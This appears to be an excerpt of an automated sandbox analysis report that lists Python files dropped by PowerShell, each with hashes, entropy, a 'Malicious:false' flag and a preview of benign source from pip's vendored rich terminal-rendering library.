                                                                                                                                                                                                            Preview:from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Sequence..if TYPE_CHECKING:. from pip._vendor.rich.console import ConsoleRenderable..from . import get_console.from .segment import Segment.from .terminal_theme import DEFAULT_TERMINAL_THEME..if TYPE_CHECKING:. from pip._vendor.rich.console import ConsoleRenderable..JUPYTER_HTML_FORMAT = """\.<pre style="white-space:pre;overflow-x:auto;line-height:normal;font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace">{code}</pre>."""...class JupyterRenderable:. """A shim to write html to Jupyter notebook.""".. def __init__(self, html: str, text: str) -> None:. self.html = html. self.text = text.. def _repr_mimebundle_(. self, include: Sequence[str], exclude: Sequence[str], **kwargs: Any. ) -> Dict[str, str]:. data = {"text/plain": self.text, "text/html": self.html}. if include:. data = {k: v for (k, v) in data.items() if k in include}. if exclude:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14007
                                                                                                                                                                                                            Entropy (8bit):4.442469633098098
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:BV1ZvLo5T5iHLfl2Hgoeg7lK/MzN6h+JEQihHxTwZRrTwVlY1PR7hsO5:BV3vIT5i0Hgoeg7hj6l8PRtsO5
                                                                                                                                                                                                            MD5:FED3D43AD246B554BB5A6F619A18CA77
                                                                                                                                                                                                            SHA1:DFB0603FC8261EED36A5CC598BF7C0ACBCF8A907
                                                                                                                                                                                                            SHA-256:44560BE8774216C1DFF5646972F8B7C3E7E98FEF0EE5D319F16F7A55D28D75B2
                                                                                                                                                                                                            SHA-512:E242F1AB046D145140592AE88260384959CEFDA44F7C12411A2E08EF6359E1F5CD53B56BD0831A7186AF7DA33BB87E19247AC388C191E1DB91D3536E31BF0657
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from abc import ABC, abstractmethod.from itertools import islice.from operator import itemgetter.from threading import RLock.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Union,.)..from ._ratio import ratio_resolve.from .align import Align.from .console import Console, ConsoleOptions, RenderableType, RenderResult.from .highlighter import ReprHighlighter.from .panel import Panel.from .pretty import Pretty.from .region import Region.from .repr import Result, rich_repr.from .segment import Segment.from .style import StyleType..if TYPE_CHECKING:. from pip._vendor.rich.tree import Tree...class LayoutRender(NamedTuple):. """An individual layout render.""".. region: Region. render: List[List[Segment]]...RegionMap = Dict["Layout", Region].RenderMap = Dict["Layout", LayoutRender]...class LayoutError(Exception):. """Layout related error."""...class NoSplitter(LayoutError):. """Requested split
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14172
                                                                                                                                                                                                            Entropy (8bit):4.2695635622522055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kK54eva5KJZc18N9Ymv/btmf61IlpahfF0F:kkC56ZceCy0F
                                                                                                                                                                                                            MD5:FE0603FC10DB96344C36F581A46D436B
                                                                                                                                                                                                            SHA1:4EC58EFD3E4D7DE6924B019330E108E42C4FD44B
                                                                                                                                                                                                            SHA-256:7A655A2D4B9AF8529262A6579AD2498C122CB4EF7D0AA30EB80EAF30029590ED
                                                                                                                                                                                                            SHA-512:A3228D8CE473F821D6EC86CE765DBD7E4D0B5A12DEEBF12F84ADEFD987BE6DA885C9550688278A3398FF51BFF91B5C9F8C088C590ADD8A3A4EEE2696ABB5DD44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from threading import Event, RLock, Thread.from types import TracebackType.from typing import IO, Any, Callable, List, Optional, TextIO, Type, cast..from . import get_console.from .console import Console, ConsoleRenderable, RenderableType, RenderHook.from .control import Control.from .file_proxy import FileProxy.from .jupyter import JupyterMixin.from .live_render import LiveRender, VerticalOverflowMethod.from .screen import Screen.from .text import Text...class _RefreshThread(Thread):. """A thread that calls refresh() at regular intervals.""".. def __init__(self, live: "Live", refresh_per_second: float) -> None:. self.live = live. self.refresh_per_second = refresh_per_second. self.done = Event(). super().__init__(daemon=True).. def stop(self) -> None:. self.done.set().. def run(self) -> None:. while not self.done.wait(1 / self.refresh_per_second):. with self.live._lock:. if not self.done.is_set()
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3667
                                                                                                                                                                                                            Entropy (8bit):4.273892873415656
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ka12MInrjbRIfZZK5T8k+q5HwoZIkyOxso/:kaIMInrpIfZQ8AwmIkIu
                                                                                                                                                                                                            MD5:F0037CF6749B4D3D6F744D57DB9385E5
                                                                                                                                                                                                            SHA1:51A5F1D9C3C933447AFB8CB433CBE0A8D9E0D0FE
                                                                                                                                                                                                            SHA-256:CC4966DCFADF488BE339C7B6F331131CC2147FDA45612500E68D007E58143FAE
                                                                                                                                                                                                            SHA-512:C8E991896AB7A39F09FD5BDB681012A5C0DE67F5BCFB0D936AE56D39C9DF95DE8F3EDAB17E0F63E3EEE13743D0BF72643AF1CF6446B10ECCB62E26421303F7B4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from typing import Optional, Tuple..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover...from ._loop import loop_last.from .console import Console, ConsoleOptions, RenderableType, RenderResult.from .control import Control.from .segment import ControlType, Segment.from .style import StyleType.from .text import Text..VerticalOverflowMethod = Literal["crop", "ellipsis", "visible"]...class LiveRender:. """Creates a renderable that may be updated... Args:. renderable (RenderableType): Any renderable object.. style (StyleType, optional): An optional style to apply to the renderable. Defaults to "".. """.. def __init__(. self,. renderable: RenderableType,. style: StyleType = "",. vertical_overflow: VerticalOverflowMethod = "ellipsis",. ) -> None:. self.renderable = renderable. self.style = style. self.vertical_overf
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11903
                                                                                                                                                                                                            Entropy (8bit):4.6168999480502295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zA9+TZLPgjEE/i1sAU+TjYQCRTnOg5R/yviAXEdk7wH1lUWxqf0UqOy:z9BPgjuG8jYJzy6vdkkH1aWxUFy
                                                                                                                                                                                                            MD5:0C56AEC264322B58B736D8DA809DB3A1
                                                                                                                                                                                                            SHA1:644FDA0F18147D728D36010BA5E309AC957A1CF3
                                                                                                                                                                                                            SHA-256:B81F9C07EDD0E1B9970CB2E96CE5A4985BE2C3E15D7B7F73C8C57AB4A2765874
                                                                                                                                                                                                            SHA-512:3B94F12D7827E069EFB232DF5F546016702CBEFD9A3C20C14D6DCDFB974F675145ED7EC8EABB8CDCE5B8B9511DD70008DCF1C17EB7178EE11C472FD9D9F198B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import logging.from datetime import datetime.from logging import Handler, LogRecord.from pathlib import Path.from types import ModuleType.from typing import ClassVar, Iterable, List, Optional, Type, Union..from pip._vendor.rich._null_file import NullFile..from . import get_console.from ._log_render import FormatTimeCallable, LogRender.from .console import Console, ConsoleRenderable.from .highlighter import Highlighter, ReprHighlighter.from .text import Text.from .traceback import Traceback...class RichHandler(Handler):. """A logging handler that renders output with Rich. The time / level / message and file are displayed in columns.. The level is color coded, and the message is syntax highlighted... Note:. Be careful when enabling console markup in log messages if you have configured logging for libraries not. under your control. If a dependency writes messages containing square brackets, it may not produce the intended output... Args:. level (Union[int,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8198
                                                                                                                                                                                                            Entropy (8bit):4.274193130885141
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:xF4EDn7uK0+Iz6+Cf2FldMT7d0Z3aeOmDfJupg8NdZ/Bf4p:xaMSK0+qCMdMT7d0ZZT8BBf4p
                                                                                                                                                                                                            MD5:76B015DBD910A9EEF9DF877C496F96AA
                                                                                                                                                                                                            SHA1:32A3922A53150C2FE754D675F7C3FBC2642889B9
                                                                                                                                                                                                            SHA-256:C73178B8069F884784603258B7FBD49C9386A1353C46B1FE3C7ED67166178C28
                                                                                                                                                                                                            SHA-512:036AAEB933662784AF7CC93044E410927A4AE115A2804604CA34E699C359467620F6DA38F69586A713D21081C4C96CF991F297D5A11FE040190AA330286C27F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.from ast import literal_eval.from operator import attrgetter.from typing import Callable, Iterable, List, Match, NamedTuple, Optional, Tuple, Union..from ._emoji_replace import _emoji_replace.from .emoji import EmojiVariant.from .errors import MarkupError.from .style import Style.from .text import Span, Text..RE_TAGS = re.compile(. r"""((\\*)\[([a-z#/@][^[]*?)])""",. re.VERBOSE,.)..RE_HANDLER = re.compile(r"^([\w.]*?)(\(.*?\))?$")...class Tag(NamedTuple):. """A tag in console markup.""".. name: str. """The tag name. e.g. 'bold'.""". parameters: Optional[str]. """Any additional parameters after the name.""".. def __str__(self) -> str:. return (. self.name if self.parameters is None else f"{self.name} {self.parameters}". ).. @property. def markup(self) -> str:. """Get the string representation of this tag.""". return (. f"[{self.name}]". if self.parameters is None. else f"[{sel
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5305
                                                                                                                                                                                                            Entropy (8bit):4.385189692280883
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:N1zgZKd+cbIxEw4AEvRZnYgHtlJnbd6TcPH7zFBl5ngu/8O:N2ZKtkeYEvRZnYgHtPbd6a7zFBft8O
                                                                                                                                                                                                            MD5:9A85D7D329B3550929E01D7B08F6AB05
                                                                                                                                                                                                            SHA1:CECFBEF0E10CB7F974BD8F494E639EBD1C6990A6
                                                                                                                                                                                                            SHA-256:1E6AC8257F2C5914C76E087C33111ACBFF37564A8D5BFEF4B3C68A3F965C608F
                                                                                                                                                                                                            SHA-512:BC39E234C2D348F1BFE5C2761594B89125FC75730462B83F32FB4339BDC0D8BD1213EDEF63F889E3191FD3B76E5BC80B42ACC4D37DF5CD12AA1171D155A158A7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from operator import itemgetter.from typing import TYPE_CHECKING, Callable, NamedTuple, Optional, Sequence..from . import errors.from .protocol import is_renderable, rich_cast..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType...class Measurement(NamedTuple):. """Stores the minimum and maximum widths (in characters) required to render an object.""".. minimum: int. """Minimum number of cells required to render.""". maximum: int. """Maximum number of cells required to render.""".. @property. def span(self) -> int:. """Get difference between maximum and minimum.""". return self.maximum - self.minimum.. def normalize(self) -> "Measurement":. """Get measurement that ensures that minimum <= maximum and minimum >= 0.. Returns:. Measurement: A normalized measurement.. """. minimum, maximum = self. minimum = min(max(0, minimum), maximum). return Measurement(max(0, minimum)
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4970
                                                                                                                                                                                                            Entropy (8bit):4.4637009687656235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:/QfEFyeWwTVHqmcHpxltdlgvmEfLvherSEbTJukfgdR9ngInYtxBV1:osAwTVHq3HLtOvmEjEpYsgdR9ngInYtP
                                                                                                                                                                                                            MD5:A5009662298B328308BD59F23F058AE3
                                                                                                                                                                                                            SHA1:40E397786A4DF256246C2E9E16C135B2A5CF8DD6
                                                                                                                                                                                                            SHA-256:913146B1D19ED28B3BB572E71CAA704C8F7409712FADC79E6460AC866272E73C
                                                                                                                                                                                                            SHA-512:7311E9407FE1D3113F28662B3ECF2D76A0671571EB5E0A437413BC21816BE0A8934D36C7F81BD960ECCC195673C9C57360EAD7C04CC0306B38AA47F32E8AAB46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import cast, List, Optional, Tuple, TYPE_CHECKING, Union..if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. RenderableType,. RenderResult,. ).from .jupyter import JupyterMixin.from .measure import Measurement.from .style import Style.from .segment import Segment...PaddingDimensions = Union[int, Tuple[int], Tuple[int, int], Tuple[int, int, int, int]]...class Padding(JupyterMixin):. """Draw space around content... Example:. >>> print(Padding("Hello", (2, 4), style="on blue")).. Args:. renderable (RenderableType): String or other renderable.. pad (Union[int, Tuple[int]]): Padding for top, right, bottom, and left borders.. May be specified with 1, 2, or 4 integers (CSS style).. style (Union[str, Style], optional): Style for padding characters. Defaults to "none".. expand (bool, optional): Expand padding to fit available width. Defaults to True.. """.. def __init__(
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):828
                                                                                                                                                                                                            Entropy (8bit):4.513073739230107
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1L8sEYBoDgl/KptAdr/H6/ez8Nnz86iOAdVyRXJ9GuUTtAd7eTI2peBw3+efFOjv:1uXMcptyza/cQiOyq7GTty78p5Ojrzn
                                                                                                                                                                                                            MD5:D2F3F5A559BCF79942CE62B742FB2CE2
                                                                                                                                                                                                            SHA1:66A01AAA2F82C4F00E8DDE3C2A7EB04E876613E7
                                                                                                                                                                                                            SHA-256:48EFC44C114A6E0DE7FC080ECD79B8D52BF7E98C57032237FD1F8A398DBFB927
                                                                                                                                                                                                            SHA-512:1A4B396A485930F04CE5A9B3E172EBDF7B826BB9F82818B3F90E24A1A25435921C93D66322F0F00BA57642268639234E8EC0DC195EB37C2DD1B15211761310AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from abc import ABC, abstractmethod.from typing import Any...class Pager(ABC):. """Base class for a pager.""".. @abstractmethod. def show(self, content: str) -> None:. """Show content in pager... Args:. content (str): Content to be displayed.. """...class SystemPager(Pager):. """Uses the pager installed on the system.""".. def _pager(self, content: str) -> Any: # .pragma: no cover. return __import__("pydoc").pager(content).. def show(self, content: str) -> None:. """Use the same pager used by pydoc.""". self._pager(content)...if __name__ == "__main__": # pragma: no cover. from .__main__ import make_test_card. from .console import Console.. console = Console(). with console.pager(styles=True):. console.print(make_test_card()).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3396
                                                                                                                                                                                                            Entropy (8bit):4.4122860472480765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ZdKJpZHWsuuOKTrtq35aZReyn6PgT4yOd1f+4H5hZwc:yFuuO335+R/n6P1yOdd+4H5hZwc
                                                                                                                                                                                                            MD5:D604E236B7A1900632C72E91BBB70442
                                                                                                                                                                                                            SHA1:30F805997188595A92C7E3A32EFFDADF5D7F7E6A
                                                                                                                                                                                                            SHA-256:9489EF4753830D3D9FDD464C7CBD60AEAEDD63FA4374A1F0E1B75480E19A3386
                                                                                                                                                                                                            SHA-512:66A0F0F427EDBC89630FCCA0C3C38465ED0537D2C0F12A5435573E6B0823E5BB849F68A976E286EED2FC0337C2CB7E743DFEA529BD4DD0B36DB8C9611098E6A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from math import sqrt.from functools import lru_cache.from typing import Sequence, Tuple, TYPE_CHECKING..from .color_triplet import ColorTriplet..if TYPE_CHECKING:. from pip._vendor.rich.table import Table...class Palette:. """A palette of available colors.""".. def __init__(self, colors: Sequence[Tuple[int, int, int]]):. self._colors = colors.. def __getitem__(self, number: int) -> ColorTriplet:. return ColorTriplet(*self._colors[number]).. def __rich__(self) -> "Table":. from pip._vendor.rich.color import Color. from pip._vendor.rich.style import Style. from pip._vendor.rich.text import Text. from pip._vendor.rich.table import Table.. table = Table(. "index",. "RGB",. "Color",. title="Palette",. caption=f"{len(self._colors)} colors",. highlight=True,. caption_justify="right",. ). for index, color in enumerate(self._colors):.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10574
                                                                                                                                                                                                            Entropy (8bit):4.186365542613164
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:v+my0IHhSwHhO7z0/KGhwuVk07dX/tCBRL8ZZFcll:E0IHhSwHhOKxUP
                                                                                                                                                                                                            MD5:2F4C4176EBB78FDB40A042F320070A30
                                                                                                                                                                                                            SHA1:DD00D9AFEDCAD33F57B5F8BF29B9E955465A9ECD
                                                                                                                                                                                                            SHA-256:C0631EE3427C2821A04283342F28D112B986224BF66EC600EF54425D3843D311
                                                                                                                                                                                                            SHA-512:C161C9A8F71660C87ED1E98157A154EF027ED3700728F2D5D77F857BAB6FBFEE4D8EF9E8B1D690FA6FEA1ACA904BE3AEA8036E13F8E19F5F1ED51FAA9AC752C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import TYPE_CHECKING, Optional..from .align import AlignMethod.from .box import ROUNDED, Box.from .cells import cell_len.from .jupyter import JupyterMixin.from .measure import Measurement, measure_renderables.from .padding import Padding, PaddingDimensions.from .segment import Segment.from .style import Style, StyleType.from .text import Text, TextType..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType, RenderResult...class Panel(JupyterMixin):. """A console renderable that draws a border around its contents... Example:. >>> console.print(Panel("Hello, World!")).. Args:. renderable (RenderableType): A console renderable object.. box (Box, optional): A Box instance that defines the look of the border (see :ref:`appendix_box`.. Defaults to box.ROUNDED.. safe_box (bool, optional): Disable box characters that don't display on windows legacy terminal with *raster* fonts. Defaults to True.. ex
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37414
                                                                                                                                                                                                            Entropy (8bit):4.290603181494599
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:mdMEUuwOTOMeXgFkkwLnIMociYLXTVXsskw9L8H2Ue35wL9KTsLpc4/uFDgBM:mifu9TOMQIeroAVXssM14VgBM
                                                                                                                                                                                                            MD5:C790D3E322380680331C57D2D829675E
                                                                                                                                                                                                            SHA1:C5487A61E868B1D96A3A7E7D5ECDC4DF16AD217A
                                                                                                                                                                                                            SHA-256:7406CBA921778C99F27C12C9ED08D0DC1D89F961B206701D1977AE0552323320
                                                                                                                                                                                                            SHA-512:913C3E18751501D17C7CF34C1D1008E200856135A9F7F57E96F46177FFC86DEEEFD16B384274406B4907819A5BF4D237A3527C60BEC87479E903C2C018161E67
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import builtins.import collections.import dataclasses.import inspect.import os.import sys.from array import array.from collections import Counter, UserDict, UserList, defaultdict, deque.from dataclasses import dataclass, fields, is_dataclass.from inspect import isclass.from itertools import islice.from types import MappingProxyType.from typing import (. TYPE_CHECKING,. Any,. Callable,. DefaultDict,. Dict,. Iterable,. List,. Optional,. Sequence,. Set,. Tuple,. Union,.)..from pip._vendor.rich.repr import RichReprResult..try:. import attr as _attr_module.. _has_attrs = True.except ImportError: # pragma: no cover. _has_attrs = False..from . import get_console.from ._loop import loop_last.from ._pick import pick_bool.from .abc import RichRenderable.from .cells import cell_len.from .highlighter import ReprHighlighter.from .jupyter import JupyterMixin, JupyterRenderable.from .measure import Measurement.from .text import Text..if TYPE_CHECKING:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):59836
                                                                                                                                                                                                            Entropy (8bit):4.478904322672059
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:3Ld+A9JUU0knm1DJCM7SLeU7R8loGMNBaNHkcy/hvaxXFw3E1VMIM7SIobK7bkl+:3xrkTkb7SllCwJFEJI3CnUS
                                                                                                                                                                                                            MD5:A4CB1E6102CF10B2A96D9CAE31ACDA95
                                                                                                                                                                                                            SHA1:7D290FC4A13D2E71015DA4CEFF55DEE611A0C539
                                                                                                                                                                                                            SHA-256:7A0F8E51175F656DE7DDB89BD7ECCFDD2665E9C226D9566EA75A6BFFDE82C8B9
                                                                                                                                                                                                            SHA-512:2FDCDA0365E3DC5B8B5A389F13AD92C7115EB2FC215BE220E990A3D65D9E0788427B85967BC7D21DB1F6BD47CA6C79C41D34B30DCEA62FABC47093BE1366EDDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import io.import sys.import typing.import warnings.from abc import ABC, abstractmethod.from collections import deque.from collections.abc import Sized.from dataclasses import dataclass, field.from datetime import timedelta.from io import RawIOBase, UnsupportedOperation.from math import ceil.from mmap import mmap.from os import PathLike, stat.from threading import Event, RLock, Thread.from types import TracebackType.from typing import (. Any,. BinaryIO,. Callable,. ContextManager,. Deque,. Dict,. Generic,. Iterable,. List,. NamedTuple,. NewType,. Optional,. Sequence,. TextIO,. Tuple,. Type,. TypeVar,. Union,.)..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover..from . import filesize, get_console.from .console import Console, Group, JustifyMethod, RenderableType.from .highlighter import Highlighter.from .jupyter import JupyterMixin.from .live
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8165
                                                                                                                                                                                                            Entropy (8bit):4.450052631152956
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:wIqIeXttprQPvV/taio45C6HoqR2II2Qv57yI:peKtG4E6HbSlp
                                                                                                                                                                                                            MD5:33F2E24B082E032F923D00B2C7928543
                                                                                                                                                                                                            SHA1:429B0AAB3F07638D96B1477AFEF4463E603BCE74
                                                                                                                                                                                                            SHA-256:704A017E473794BC2A6DAE172AC529CB8BD240A0E1D9043927627DE3E002168A
                                                                                                                                                                                                            SHA-512:116173D386AAD60EC096BCFFF96FBDB01A51CE79314E61CAF6A4CD340EDE8FC6656F1489DBD8ADCC809E00FEFB0863B5A5181635C8D0F8055D7C2E3DA6AEFEE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import math.from functools import lru_cache.from time import monotonic.from typing import Iterable, List, Optional..from .color import Color, blend_rgb.from .color_triplet import ColorTriplet.from .console import Console, ConsoleOptions, RenderResult.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import Style, StyleType..# Number of characters before 'pulse' animation repeats.PULSE_SIZE = 20...class ProgressBar(JupyterMixin):. """Renders a (progress) bar. Used by rich.progress... Args:. total (float, optional): Number of steps in the bar. Defaults to 100. Set to None to render a pulsing animation.. completed (float, optional): Number of steps completed. Defaults to 0.. width (int, optional): Width of the bar, or ``None`` for maximum width. Defaults to None.. pulse (bool, optional): Enable pulse effect. Defaults to False. Will pulse if a None total was passed.. style (StyleType, optiona
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11303
                                                                                                                                                                                                            Entropy (8bit):4.43699046794763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mchRbuyp1UkLWCbdSzkPO2sGvk7DCkgwbJQhx4/3WPqEXBnh:9RaWUkLWgQCvkbFQbw4Bnh
                                                                                                                                                                                                            MD5:E0281226F8FB9EA9A3D09525BB501715
                                                                                                                                                                                                            SHA1:244E7DF24D577C830A6226F32DEB8AA37845D3B4
                                                                                                                                                                                                            SHA-256:C74996FA920FA1D24CE2BCBA82B82698BAE5F15669F7D92A72676705EEF46180
                                                                                                                                                                                                            SHA-512:F7E7C74C717FBCC1EF5ED921B752FD231E9445E1480EC53DA72361333A212EE7B7162FBD7932C4E4B839C32A6B7328457777697FA5D30C1A3D7AF83F3E4DE959
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, Generic, List, Optional, TextIO, TypeVar, Union, overload..from . import get_console.from .console import Console.from .text import Text, TextType..PromptType = TypeVar("PromptType").DefaultType = TypeVar("DefaultType")...class PromptError(Exception):. """Exception base class for prompt related errors."""...class InvalidResponse(PromptError):. """Exception to indicate a response was invalid. Raise this within process_response() to indicate an error. and provide an error message... Args:. message (Union[str, Text]): Error message.. """.. def __init__(self, message: TextType) -> None:. self.message = message.. def __rich__(self) -> TextType:. return self.message...class PromptBase(Generic[PromptType]):. """Ask the user for input until a valid response is received. This is the base class, see one of. the concrete classes for examples... Args:. prompt (TextType, optional): Prompt text. Defaults to ""..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1391
                                                                                                                                                                                                            Entropy (8bit):4.677919843990067
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RE+Gvpa4VWg60Wno0nN4RD6w5MojjfupzvoWgDnx6NWHa5c:yxa4Ig6Vo0nil6yMIj6bAnksKc
                                                                                                                                                                                                            MD5:ECCF6E3694A59DBF6F3E5ADFBA43F6FC
                                                                                                                                                                                                            SHA1:A2DCA9D46365F198635DE5BBFD6C2628566AB28F
                                                                                                                                                                                                            SHA-256:E611C70C3347724764F22587E7311B8BECEE215485E616D4DA3228E3B47B9531
                                                                                                                                                                                                            SHA-512:9FF97476A1D87AE9F79172224791F4D2E6B62C222BD494EB281A544CAEADC7A3E86FD2506800E6D5596F2004F6FAE50698956252BC6E2E791609EA5708CBB824
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, cast, Set, TYPE_CHECKING.from inspect import isclass..if TYPE_CHECKING:. from pip._vendor.rich.console import RenderableType.._GIBBERISH = """aihwerij235234ljsdnp34ksodfipwoe234234jlskjdf"""...def is_renderable(check_object: Any) -> bool:. """Check if an object may be rendered by Rich.""". return (. isinstance(check_object, str). or hasattr(check_object, "__rich__"). or hasattr(check_object, "__rich_console__"). )...def rich_cast(renderable: object) -> "RenderableType":. """Cast an object to a renderable by calling __rich__ if present... Args:. renderable (object): A potentially renderable object.. Returns:. object: The result of recursively calling __rich__.. """. from pip._vendor.rich.console import RenderableType.. rich_visited_set: Set[type] = set() # Prevent potential infinite loop. while hasattr(renderable, "__rich__") and not isclass(renderable):. # Detect object which claim to ha
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166
                                                                                                                                                                                                            Entropy (8bit):4.33185364800402
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1REvgBrABxhT75EIABrwNFHWDyRTLT/oKDFRSdPlnt8/mod/ofld/3s5FMlv:1REYBcdXDN8DuLXZRAo6fu0
                                                                                                                                                                                                            MD5:2B7A3FC13DCDE9DECA6D3A7217B45DE8
                                                                                                                                                                                                            SHA1:F38FC0DB54D1FA3E66820604153208C316DC4DF3
                                                                                                                                                                                                            SHA-256:ACD4FDC59AD56536085D90B43589F8D42250C1835B47E29E70F3B14E042F07C6
